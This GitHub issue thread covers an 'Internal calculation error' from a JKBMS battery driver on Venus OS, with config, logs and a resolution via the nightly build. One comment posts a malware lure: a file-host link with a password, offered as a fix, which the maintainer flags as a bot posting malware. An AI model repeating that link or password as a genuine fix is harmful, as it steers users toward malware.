Louisvdw/dbus-serialbattery #1118: Battery Monitor - JKBMS [2] - Error: Internal calculation error

iz3man, 2024-08-28:
### Describe the bug

I swapped out the batteries connected to my JKBMS (from 100Ah to 280Ah), but systems 15s. I changed the maximum charge/discharge capavilities, and the total Ah in the BMS directly, and altered max charge/discharge in the config.ini. Afair this is all I changed. After connection to Victron all data that I changed showed up correctly. But after a short time, VRM showed "Battery Monitor - JKBMS [2] - Error: Internal calculation error". I thought this was due to new capacity and the battery maybe needs to fully charge/discharge once or twice. But after 2 weeks this error still pops up every now and then.

### How to reproduce

Not sure. I don't know if the error will disappeas if I change back to 100Ah cells, as I don't have them anymore. Fact is, that it appeared after swapping the cells.

### Expected behavior

No error appear

### Driver version

1.3.20240705

### Venus OS device type

Raspberry Pi 3

### Venus OS version

v3.50~13

### BMS type

JKBMS / Heltec BMS

### Cell count

15

### Battery count

1

### Connection type

Serial USB adapter to TTL

### Config file

```ini
[DEFAULT]

; --------- Battery Current limits ---------
MAX_BATTERY_CHARGE_CURRENT    = 200
MAX_BATTERY_DISCHARGE_CURRENT = 200

; --------- Cell Voltages ---------
; Description: Cell min/max voltages which are used to calculate the min/max battery voltage
; Example: 16 cells * 3.45V/cell = 55.2V max charge voltage. 16 cells * 2.90V = 46.4V min discharge voltage

MIN_CELL_VOLTAGE   = 2.80

; Max voltage (can seen as absorption voltage)

MAX_CELL_VOLTAGE   = 3.45

; Float voltage (can be seen as resting voltage)

FLOAT_CELL_VOLTAGE = 3.375

; Bulk voltage (may be needed to reset the SoC to 100% once in a while for some BMS)
; Has to be higher as the MAX_CELL_VOLTAGE

BULK_CELL_VOLTAGE  = 3.650

; Specify after how many days the bulk voltage should be reached again
; The timer is reset when the bulk voltage is reached
[... 319 lines cut ...]
```

### Relevant log output

```shell
@4000000066bb3ed20c392874 INFO: loading config file /data/conf/serial-starter.d/dbus-serialbattery.conf
@4000000066bb3f3818e41bc4 INFO: Create daemontools service dbus-serialbattery.ttyUSB0
@4000000066bb3f3e1cd8be24 INFO: Start service dbus-serialbattery.ttyUSB0 once
@4000000066bb6d1313191f3c INFO: Start service dbus-serialbattery.ttyUSB0 once
@4000000066bb6d4506f1d30c INFO: Start service dbus-serialbattery.ttyUSB0 once
@4000000066bc5cb92e5c280c INFO: loading config file /data/conf/serial-starter.d/dbus-serialbattery.conf
@4000000066bc5ccb14478164 INFO: Create daemontools service dbus-serialbattery.ttyUSB0
@4000000066bc5cd123d74cf4 INFO: Start service dbus-serialbattery.ttyUSB0 once
@4000000066bc5d322426054c INFO: Start service dbus-serialbattery.ttyUSB0 once
@4000000066bf6c863a6bbdec INFO: loading config file /data/conf/serial-starter.d/dbus-serialbattery.conf
@4000000066bf6c973b43bae4 ERROR: no service template for dbus-serialbattery
@4000000066bf6cd00385c584 INFO: loading config file /data/conf/serial-starter.d/dbus-serialbattery.conf
@4000000066bf6d09154f585c INFO: Create daemontools service dbus-serialbattery.ttyUSB0
@4000000066bf6d0f182a5cfc INFO: Start service dbus-serialbattery.ttyUSB0 once
```

### Any other information that may be helpful

VRM online portal shows: "Status: **ALARM**", even though everything is working perfectly fine
To me it SEEMS the consumed Ah exceed what the system assumes is correct (was 90Ah before), and that's why it's throwing an error. Maybe there still is some config error in my config.ini or in the BMS settings directly?!

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

iz3man, 2024-08-28:
@ViniciusSCG Thanks for the quick help, but I have no idea what to do with this file. And how it would help? VenusOS is Linux, and the machine I'm checking on is Linux as well. So what should I do with some win64 code?

mr-manuel, 2024-08-28:
DO NOT OPEN THE FILE. This is a bot posting malware.

iz3man, 2024-08-28:
> DO NOT OPEN THE FILE. This is a bot posting malware.

Thanks. That's what it looked like to me as well :) Hard to fool someone one a linux system with windows executables ;)

mr-manuel, 2024-08-28:
Unfortunately you did not read the instructions carefully. Please try again.

In your case:

## 🚨 IMPORTANT 🚨

* Please carefully read all the instructions below including the descriptions! Very often we have to request the data again, because it was not provided in the first place.

* Please try the `nightly` build first, if you are not already using it. It's very likely that the bug is already fixed. See [here](https://louisvdw.github.io/dbus-serialbattery/general/install#nightly-build) how to install it.

* Faulty log output/logs missing: https://mr-manuel.github.io/venus-os_dbus-serialbattery_docs/troubleshoot/#serial-bms-connection

iz3man, 2024-08-28:
root@raspberrypi2:~# tail -F -n 100 /data/log/dbus-serialbattery.ttyUSB0/current | tai64nlocal
2024-08-14 07:30:06.107254500 INFO:SerialBattery:com.victronenergy.battery.ttyUSB0
2024-08-14 07:30:06.184960500 INFO:SerialBattery:publish config values = False
2024-08-14 07:30:06.186579500 INFO:SerialBattery:Battery JKBMS connected to dbus from /dev/ttyUSB0
2024-08-14 07:30:06.187233500 INFO:SerialBattery:========== Settings ==========
2024-08-14 07:30:06.196895500 INFO:SerialBattery:> Connection voltage: 49.8 V | Current: 17.59 A | SoC: 32%
2024-08-14 07:30:06.197780500 INFO:SerialBattery:> Cell count: 15 | Cells populated: 15
2024-08-14 07:30:06.198482500 INFO:SerialBattery:> LINEAR LIMITATION ENABLE: True
2024-08-14 07:30:06.209783500 INFO:SerialBattery:> MIN CELL VOLTAGE: 2.800 V | MAX CELL VOLTAGE: 3.450 V| FLOAT CELL VOLTAGE: 3.375 V
2024-08-14 07:30:06.218685500 INFO:SerialBattery:> MAX BATTERY CHARGE CURRENT: 200.0 A | MAX BATTERY DISCHARGE CURRENT: 200.0 A
2024-08-14 07:30:06.219190500 INFO:SerialBattery:> MAX BATTERY CHARGE CURRENT: 60.0 A | MAX BATTERY DISCHARGE CURRENT: 80.0 A (read from BMS)
2024-08-14 07:30:06.219749500 INFO:SerialBattery:> CVCM:     True
2024-08-14 07:30:06.230527500 INFO:SerialBattery:> CCCM CV:  True  | DCCM CV:  True
2024-08-14 07:30:06.231112500 INFO:SerialBattery:> CCCM T:   True  | DCCM T:   True
2024-08-14 07:30:06.231641500 INFO:SerialBattery:> CCCM SOC: False | DCCM SOC: True
2024-08-14 07:30:06.232130500 INFO:SerialBattery:> CHARGE FET: True | DISCHARGE FET: True | BALANCE FET: True
2024-08-14 07:30:06.232626500 INFO:SerialBattery:Serial Number/Unique Identifier: JK-BD6A20S10
2024-08-14 07:30:27.591418500 ERROR:SerialBattery:>>> ERROR: No reply - returning [len:115/4011]
2024-08-14 07:30:33.662060500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x5986, Got 0x58e1
2024-08-14 07:30:59.622691500 ERROR:SerialBattery:>>> ERROR: No reply - returning [len:281/287]
2024-08-16 15:12:59.288343500 *** CCGX booted (0) ***
2024-08-16 15:13:57.346331500 *** CCGX booted (0) ***
2024-08-16 15:15:14.999901500 INFO:SerialBattery:
2024-08-16 15:15:15.000430500 INFO:SerialBattery:Starting dbus-serialbattery
2024-08-16 15:15:15.009558500 INFO:SerialBattery:Venus OS v3.50~13
2024-08-16 15:15:15.009564500 INFO:SerialBattery:dbus-serialbattery v1.3.20240705
2024-08-16 15:15:31.020297500 INFO:SerialBattery:-- Testing BMS: 1 of 3 rounds
2024-08-16 15:15:31.020856500 INFO:SerialBattery:Testing Jkbms
2024-08-16 15:15:31.075524500 INFO:SerialBattery:Connection established to Jkbms
2024-08-16 15:15:31.083679500 WARNING:root:USING OUTDATED REGISTRATION METHOD!
2024-08-16 15:15:31.084137500 WARNING:root:Please set register=False, then call the register method after adding all mandatory paths. See https://github.com/victronenergy/venus/wiki/dbus-api
2024-08-16 15:15:31.532918500 INFO:SerialBattery:Found existing battery with DeviceInstance = 2
2024-08-16 15:15:31.838498500 INFO:SerialBattery:DeviceInstance = 2
2024-08-16 15:15:31.839910500 INFO:SerialBattery:PID file created successfully: /var/tmp/dbus-serialbattery_2.pid
2024-08-16 15:15:31.840854500 INFO:SerialBattery:Used DeviceInstances = ['1', '2']
2024-08-16 15:15:31.841480500 INFO:SerialBattery:com.victronenergy.battery.ttyUSB0
2024-08-16 15:15:31.882618500 INFO:SerialBattery:publish config values = False
2024-08-16 15:15:31.884281500 INFO:SerialBattery:Battery JKBMS connected to dbus from /dev/ttyUSB0
2024-08-16 15:15:31.884764500 INFO:SerialBattery:========== Settings ==========
2024-08-16 15:15:31.885403500 INFO:SerialBattery:> Connection voltage: 51.2 V | Current: 14.6 A | SoC: 99%
2024-08-16 15:15:31.885849500 INFO:SerialBattery:> Cell count: 15 | Cells populated: 15
2024-08-16 15:15:31.887143500 INFO:SerialBattery:> LINEAR LIMITATION ENABLE: True
2024-08-16 15:15:31.887819500 INFO:SerialBattery:> MIN CELL VOLTAGE: 2.800 V | MAX CELL VOLTAGE: 3.450 V| FLOAT CELL VOLTAGE: 3.375 V
2024-08-16 15:15:31.888415500 INFO:SerialBattery:> MAX BATTERY CHARGE CURRENT: 200.0 A | MAX BATTERY DISCHARGE CURRENT: 200.0 A
2024-08-16 15:15:31.889039500 INFO:SerialBattery:> MAX BATTERY CHARGE CURRENT: 70.0 A | MAX BATTERY DISCHARGE CURRENT: 80.0 A (read from BMS)
2024-08-16 15:15:31.889646500 INFO:SerialBattery:> CVCM:     True
2024-08-16 15:15:31.890175500 INFO:SerialBattery:> CCCM CV:  True  | DCCM CV:  True
2024-08-16 15:15:31.890789500 INFO:SerialBattery:> CCCM T:   True  | DCCM T:   True
2024-08-16 15:15:31.891292500 INFO:SerialBattery:> CCCM SOC: False | DCCM SOC: True
2024-08-16 15:15:31.891859500 INFO:SerialBattery:> CHARGE FET: True | DISCHARGE FET: True | BALANCE FET: True
2024-08-16 15:15:31.892345500 INFO:SerialBattery:Serial Number/Unique Identifier: JK-BD6A20S10
2024-08-26 14:28:50.942541500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x4e7b, Got 0x4e83
2024-08-27 12:24:12.670591500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x4e66, Got 0x4ee6
2024-08-27 12:27:58.116983500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x4d94, Got 0x4dba
2024-08-27 12:35:22.771420500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x4eb2, Got 0x4ed2
2024-08-27 12:35:56.810903500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x4e9e, Got 0x4ebe
2024-08-27 12:37:05.993835500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x4df5, Got 0x4e75
2024-08-27 12:40:09.280846500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x4e1a, Got 0x4e9a
2024-08-28 07:30:34.622984500 *** CCGX booted (0) ***
[... cut ...]
2024-08-28 07:31:47.960397500 INFO:SerialBattery:> CHARGE FET: True | DISCHARGE FET: True | BALANCE FET: True
2024-08-28 07:31:47.960846500 INFO:SerialBattery:Serial Number/Unique Identifier: JK-BD6A20S10
2024-08-28 07:32:11.966745500 ERROR:SerialBattery:>>> ERROR: No reply - returning [len:96/2738]
2024-08-28 07:32:18.031757500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x49c3, Got 0x491e
2024-08-28 07:32:29.048820500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x494d, Got 0x4889``

mr-manuel, 2024-08-28:
Now we are a bit closer, you read 2 of 3. You are still not using the nightly build.

iz3man, 2024-08-28:
> Now we are a bit closer, you read 2 of 3. You are still not using the nightly build.

one step after the other

mr-manuel, 2024-08-28:
There are no fresh logs of the nightly build.

iz3man, 2024-08-28:
> ```shell
> 2024-08-28 08:59:46.484105500 INFO:SerialBattery:Starting dbus-serialbattery
> 2024-08-28 08:59:46.488481500 INFO:SerialBattery:Venus OS v3.50~13
> 2024-08-28 08:59:46.489034500 INFO:SerialBattery:dbus-serialbattery v1.3.20240705
> 2024-08-28 09:00:02.496545500 INFO:SerialBattery:-- Testing BMS: 1 of 3 rounds
> 2024-08-28 09:00:02.497075500 INFO:SerialBattery:Testing Jkbms
> 2024-08-28 09:00:13.496760500 INFO:SerialBattery:
> 2024-08-28 09:00:13.497235500 INFO:SerialBattery:Starting dbus-serialbattery
> 2024-08-28 09:00:13.505774500 INFO:SerialBattery:Venus OS v3.50~13
> 2024-08-28 09:00:13.505782500 INFO:SerialBattery:dbus-serialbattery v1.4.20240826dev
> 2024-08-28 09:00:26.512930500 *** CCGX booted (0) ***
> ```

Those ARE the latest logs. It shows Aug26 dev. Anything else you're missing? I have no idea where the 1.3 debug info comes from. Should I manually deinstall it?

iz3man, 2024-08-28:
I manually did uninstall the old driver, rebooted and reinstalled the nightly:

`2024-08-28 09:00:26.512930500 *** CCGX booted (0) ***
2024-08-28 09:02:16.624240500 INFO:SerialBattery:
2024-08-28 09:02:16.624931500 INFO:SerialBattery:Starting dbus-serialbattery
2024-08-28 09:02:16.626599500 INFO:SerialBattery:Venus OS v3.50~13
2024-08-28 09:02:16.627177500 INFO:SerialBattery:dbus-serialbattery v1.4.20240826dev
2024-08-28 09:02:32.639488500 INFO:SerialBattery:-- Testing BMS: 1 of 3 rounds
2024-08-28 09:02:32.639495500 INFO:SerialBattery:Testing Jkbms
2024-08-28 09:02:32.928960500 ERROR:SerialBattery:>>> ERROR: No reply - returning
2024-08-28 09:02:33.431006500 INFO:SerialBattery:-- Testing BMS: 2 of 3 rounds
2024-08-28 09:02:33.431454500 INFO:SerialBattery:Testing Jkbms
2024-08-28 09:02:33.486127500 INFO:SerialBattery:Connection established to Jkbms
2024-08-28 09:02:33.995916500 INFO:SerialBattery:Found existing battery with DeviceInstance = 2
2024-08-28 09:02:34.300497500 INFO:SerialBattery:DeviceInstance = 2
2024-08-28 09:02:34.301916500 INFO:SerialBattery:PID file created successfully: /var/tmp/dbus-serialbattery_2.pid
2024-08-28 09:02:34.302538500 INFO:SerialBattery:Used DeviceInstances = ['1', '2']
2024-08-28 09:02:34.303037500 INFO:SerialBattery:com.victronenergy.battery.ttyUSB0__0
2024-08-28 09:02:34.341548500 INFO:SerialBattery:publish config values = False
2024-08-28 09:02:34.353216500 INFO:SerialBattery:Polling data every 1.000 s
2024-08-28 09:02:34.354699500 INFO:SerialBattery:Battery JKBMS connected to dbus from /dev/ttyUSB0
2024-08-28 09:02:34.355190500 INFO:SerialBattery:========== Settings ==========
2024-08-28 09:02:34.355795500 INFO:SerialBattery:> Connection voltage: 50.13 V | Current: -2.62 A | SoC: 63%
2024-08-28 09:02:34.356230500 INFO:SerialBattery:> Cell count: 15 | Cells populated: 15
2024-08-28 09:02:34.356697500 INFO:SerialBattery:> LINEAR LIMITATION ENABLE: True
2024-08-28 09:02:34.357222500 INFO:SerialBattery:> MIN CELL VOLTAGE: 2.800 V | MAX CELL VOLTAGE: 3.450 V| FLOAT CELL VOLTAGE: 3.375 V
2024-08-28 09:02:34.357721500 INFO:SerialBattery:> MAX BATTERY CHARGE CURRENT: 200.0 A | MAX BATTERY DISCHARGE CURRENT: 200.0 A
2024-08-28 09:02:34.364186500 INFO:SerialBattery:> MAX BATTERY CHARGE CURRENT: 70.0 A | MAX BATTERY DISCHARGE CURRENT: 80.0 A (read from BMS)
2024-08-28 09:02:34.364196500 INFO:SerialBattery:> CVCM:     True
2024-08-28 09:02:34.364199500 INFO:SerialBattery:> CCCM CV:  True  | DCCM CV:  True
2024-08-28 09:02:34.364203500 INFO:SerialBattery:> CCCM T:   True  | DCCM T:   True
2024-08-28 09:02:34.364206500 INFO:SerialBattery:> CCCM SOC: False | DCCM SOC: True
2024-08-28 09:02:34.364210500 INFO:SerialBattery:> CHARGE FET: True | DISCHARGE FET: True | BALANCE FET: True
2024-08-28 09:02:34.364339500 INFO:SerialBattery:Serial Number/Unique Identifier: JK-BD6A20S10
2024-08-28 09:39:47.985590500 *** CCGX booted (0) ***`

mr-manuel, 2024-08-28:
`*** CCGX booted (0) ***` indicates a GX device reboot. After there are no new logs. Maybe the serial port changed.

iz3man, 2024-08-28:
> `*** CCGX booted (0) ***` indicates a GX device reboot. After there are no new logs. Maybe the serial port changed.

You're right. Sorry. Didn't note that. I was just looking to see the new driver version mentioned.

iz3man, 2024-08-28:
[image]

This is from just now. I have no idea which log file would show this error message.

Gavsv8, 2024-08-29:
Hi, I have 4 Daly BMS in parrallel and am using the 232 ports on the interface board. I also used to get the internal calculation error and loss of a bms comms link sometimes when under load charging or discharging. Since going to the nightly build a couple of days ago so far so good. Thanks for all the hard work. I'll let you know if anything changes.

iz3man, 2024-08-29:
Yep. Seems the nightly code was the solution. No more "internal calculation error" since yesterday afternoon. I will observe some more days and will report here if it comes back, but otherwise the ticket can be closed from me side.
Thanks for the support!

closed 2024-08-29 by mr-manuel